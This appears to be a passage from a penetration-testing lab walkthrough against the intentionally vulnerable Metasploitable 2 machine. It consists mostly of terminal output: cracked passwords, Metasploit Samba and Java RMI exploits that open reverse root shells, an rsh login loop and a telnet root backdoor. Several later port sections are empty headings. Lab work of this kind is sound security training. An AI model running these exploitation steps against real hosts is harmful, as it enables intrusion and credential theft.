Loaded 7 password hashes with 7 different salts (md5crypt, crypt(3) $1$ [MD5 128/128 AVX 4x3])
Remaining 3 password hashes with 3 different salts
Press 'q' or Ctrl-C to abort, almost any other key for status
postgres         (postgres)
msfadmin         (msfadmin)
root@kali:~#
root@kali:~# john -show unshadowed 
sys:batman:3:3:sys:/dev:/bin/sh
klog:123456789:103:104::/home/klog:/bin/false
msfadmin:msfadmin:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
postgres:postgres:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
user:user:1001:1001:just a user,111,,:/home/user:/bin/bash
service:service:1002:1002:,,,:/home/service:/bin/bash

6 password hashes cracked, 1 left

Port 139 and 445

msf > use auxiliary/admin/smb/samba_symlink_traversal
msf auxiliary(admin/smb/samba_symlink_traversal) > show options

Module options (auxiliary/admin/smb/samba_symlink_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST      10.10.10.101     yes       The target address
   RPORT      445              yes       The SMB service port (TCP)
   SMBSHARE                    yes       The name of a writeable share on the server
   SMBTARGET  rootfs           yes       The name of the directory that should point to the root filesystem

msf auxiliary(admin/smb/samba_symlink_traversal) > set SMBSHARE tmp
SMBSHARE => tmp
msf auxiliary(admin/smb/samba_symlink_traversal) > run

[*] 10.10.10.101:445 - Connecting to the server...
[*] 10.10.10.101:445 - Trying to mount writeable share 'tmp'...
[*] 10.10.10.101:445 - Trying to link 'rootfs' to the root filesystem...
[*] 10.10.10.101:445 - Now access the following share to browse the root filesystem:
[*] 10.10.10.101:445 - 	\\10.10.10.101\tmp\rootfs\

[*] Auxiliary module execution completed
msf auxiliary(admin/smb/samba_symlink_traversal) >

We can now map the share and browse the root file system.

root@kali:~# smbclient -L 10.10.10.101
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	tmp             Disk      oh noes!
	opt             Disk      
	IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
	ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            METASPLOITABLE
root@kali:~# smbclient //10.10.10.101/tmp
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jul 29 15:23:44 2018
  ..                                 DR        0  Mon May 21 04:36:12 2012
  4467.jsvc_up                        R        0  Fri Jul 27 21:38:21 2018
  .ICE-unix                          DH        0  Fri Jul 27 21:38:00 2018
  orbit-msfadmin                     DR        0  Sat Jul 28 20:25:32 2018
  .X11-unix                          DH        0  Fri Jul 27 21:38:07 2018
  .X0-lock                           HR       11  Fri Jul 27 21:38:07 2018
  rootfs                             DR        0  Mon May 21 04:36:12 2012
  gconfd-msfadmin                    DR        0  Sat Jul 28 20:25:32 2018

		7282168 blocks of size 1024. 5418792 blocks available
smb: \>

Since we have access to the root file system which has been mapped under the tmp share, we can attempt to obtain confidential data, such as the passwd and shadow file dumps to obtain credentials. Another possible, and perhaps a direct exploit may be using:

msf > use exploit/multi/samba/usermap_script
msf exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  10.10.10.101     yes       The target address
   RPORT  139              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP double handler on 10.10.10.100:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo VSMZEdzvYTQB0sEZ;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "VSMZEdzvYTQB0sEZ\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (10.10.10.100:4444 -> 10.10.10.101:53066) at 2018-08-05 16:27:35 +1000

whoami
root
hostname
metasploitable

Port 512-514

for u in $(cat /root/msfusers.txt); do rsh -l $u 10.10.10.101; done

We keep getting the password prompt for each user we attempt to authenticate as. Apparently this is because we don’t have the rsh-client installed on kali, so I proceeded to install it using apt-get install rsh-client -y (See: http://www.kalitutorials.net/2014/05/metasploitable-2-vulnerability.html). When we try again we can get shell access for various users, including:

  • backup
  • bin
  • daemon
  • games
  • gnats
  • irc
  • libuuid
  • list
  • lp
  • mail
  • man
  • msfadmin
  • news
  • nobody
  • postgres
  • proxy
  • service
  • sys
  • user
  • uucp
  • www-data
  • root

Port 1099

msf auxiliary(scanner/misc/java_rmi_server) > use exploit/multi/misc/java_rmi_server
msf exploit(multi/misc/java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
   RHOST      10.10.10.101     yes       The target address
   RPORT      1099             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)


msf exploit(multi/misc/java_rmi_server) > exploit

[*] Started reverse TCP handler on 10.10.10.100:4444 
[*] 10.10.10.101:1099 - Using URL: http://0.0.0.0:8080/CNnZ9xPLqN06
[*] 10.10.10.101:1099 - Local IP: http://10.0.2.15:8080/CNnZ9xPLqN06
[*] 10.10.10.101:1099 - Server started.
[*] 10.10.10.101:1099 - Sending RMI Header...
[*] 10.10.10.101:1099 - Sending RMI Call...
[*] 10.10.10.101:1099 - Replied to request for payload JAR
[*] Sending stage (53837 bytes) to 10.10.10.101
[*] Meterpreter session 1 opened (10.10.10.100:4444 -> 10.10.10.101:34162) at 2018-08-06 20:59:02 +1000

[-] 10.10.10.101:1099 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 10.10.10.101:1099 - Server stopped.
[*] Exploit completed, but no session was created.
msf exploit(multi/misc/java_rmi_server) > 
msf exploit(multi/misc/java_rmi_server) > sessions

Active sessions
===============

  Id  Name  Type                    Information            Connection
  --  ----  ----                    -----------            ----------
  1         meterpreter java/linux  root @ metasploitable  10.10.10.100:4444 -> 10.10.10.101:34162 (10.10.10.101)

msf exploit(multi/misc/java_rmi_server) > sessions 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer    : metasploitable
OS          : Linux 2.6.24-16-server (i386)
Meterpreter : java/linux
meterpreter > shell
Process 1 created.
Channel 1 created.
whoami
root
hostname
metasploitable
^Z
Background channel 1? [y/N]  y
meterpreter > 
Background session 1? [y/N]  
msf exploit(multi/misc/java_rmi_server) >

Port 1524

root@kali:~# telnet 10.10.10.101 1524
Trying 10.10.10.101...
Connected to 10.10.10.101.
Escape character is '^]'.
root@metasploitable:/# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:/# root@metasploitable:/# hostname
metasploitable
root@metasploitable:/# root@metasploitable:/#

Port 2121

Port 3306

Port 3632

Port 5432

Port 5900

Port 6000

Port 6667

Port 6697

Port 8009

Port 8180

Port 8787

Port 34009

Port 35709

Port 47474

Port 51622

References

See also